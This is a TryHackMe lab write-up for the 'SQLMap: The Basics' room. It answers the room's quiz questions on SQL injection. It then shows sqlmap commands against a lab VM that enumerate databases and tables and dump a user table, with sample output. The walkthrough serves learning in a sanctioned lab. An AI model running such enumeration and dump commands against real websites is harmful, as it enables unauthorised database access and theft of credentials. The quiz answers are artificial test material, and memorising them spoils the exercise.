SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium Room | SuNnY

The Full Writeup for this Room can also be found on my Medium Page -

>> Sunny Singh Verma || Medium Profile <<

Kudos To the Creators of this Room ??

To Get Latest Writeups on TryHackMe Follow me on Linkedin

>> My Linkedin Page | Sunny Singh Verma <<

Room Type

Only subscribers can deploy virtual machines in this room! Go to your profile page to subscribe (if you have not already). Do note : Premium Subscription is required to solve this room

Let’s Start the Party

This writeup is a part of TryHackMe’s Learning Path → Cyber Security 101

Check this Learning Path here → Cyber Security 101 Learning Path <<

Task 1 : Introduction

It’s adviced to give this module a good read before proceeding to the Task 2.

Let’s proceed to Task 2

Task 2 : SQL Injection Vulnerability

Task 2 — Question 1 : Which boolean operator checks if at least one side of the operator is true for the condition to be true?

The boolean operator that checks if at least one side of the condition is true for the entire condition to be true is the OR operator.

Task 2 — Question 2 : Is 1=1 in an SQL query always true? (YEA/NAY)

The Answer is YEA, in an SQL query, 1=1 is always true.

Task 2 Complete !

Task 3 : Automated SQL Injection Tool

Task 3 Question 1 : Which flag in the SQLMap tool is used to extract all the databases available?

- -dbs

Task 3 Question 2 : What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: https://sqlmaptesting.thm/search/cat=1)

sqlmap -u https://sqlmaptesting.thm/search/cat=1 -D members --tables

Task 3 Complete !

Task 4 : Practical Exercise

This is a Practical Module , Let’s fire up the VM ??before proceeding ( Start Machine )

The Room recommends Starting AttackBox

1. Let’s Open the Browser and Navitage to this Page → https://10.10.249.16/ai/login

2. We are greeted with a Login Page as shown above????

3. Right-click on the page and select Inspect (or press Ctrl + Shift + I / Cmd + Option + I on Mac).

4. In the developer tools, navigate to the Network tab.

5. To Capture the GET request from the Browser , Let’s Use test as Username and test as Password → test:test ( This is also used and demonstrated in the Module of this room )

6. Then Refresh the Network Tab and We will get the GET Request

7. We can Copy this URL to solve further Questions in this Task

Steps Performed in a Video Snippet →

So we have our Target URI with us →

https://10.10.249.16/ai/includes/user_login?email=test&password=test        

Do Note → Your IP can be different than the IP i have got in this Room Just replace the IP holder with yours

Let’s now Answer the Questions →

Task 4 Question 1 : How many databases are available in this web application?

Using our target URL let’s find the answer

By Running the SQLMap command to list all the databases using the --dbs flag. The output will show the number of databases available in the application.

sqlmap -u “https://10.10.249.16/ai/includes/user_login?email=test&password=test” --dbs -level=5

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" --dbs -level=5        

Note → Don’t forget to wrap the URL inside “ ” other wise the flag --dbs gets ignored and an error is returned

After executing the command, SQLMap will output a list of databases. The correct answer can be inferred from this output.

Now the Motion Graphics Image with Command and result →

Answer is 6

available databases [6]:
[*] ai
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test        

Task 4 — Question 2 : What is the name of the table available in the “ai” database?

Using the same Target URI we are going to solve this question →

After identifying the available databases, use the SQLMap command with the -D ai --tables flags to fetch the tables from the "ai" database.

sqlmap -u “https://10.10.249.16/ai/includes/user_login?email=test&password=test” -D ai --tables -level=5

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai --tables -level=5        

Note → Again , Don’t forget to wrap the URL inside “ ”

SQLMap will list the tables in the specified database →

Now with the Motion Graphics →

Answer to Task 4 Question 2 is →

Users        

Task 4 Question 3 : What is the password of the email [email protected]?

Using the same Target URI as the above questions we are going to solve this final question as well !

After you know the table name (in this case, “user”), use the SQLMap command to dump the records from that table, specifying the database and table.

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai -T user --dump -level=5        

Note → Again as always , Don’t forget to wrap the URL inside “ ” to avoid errors

Now with the Motion Graphics to understand better →

Task 4 and the Room => Done !

Congrats ! We have now solved all the tasks of this room !

Hope you have enjoyed solving this room as much i did

if you want to get the latest Try Hack Me writeups delivered , go ahead and follow me on Medium and also hit the notify via email

Let’s Connect on Linkedin →

Linkedin Profile || Sunny Singh Verma

You can also add me Respect on — Hack The Box if you want i would really appreciate it :)

>> My HackTheBox Profile <<

My TryHackMe Profile Page →

>> My TryHackMe Profile <<

Thank you ! SuNnY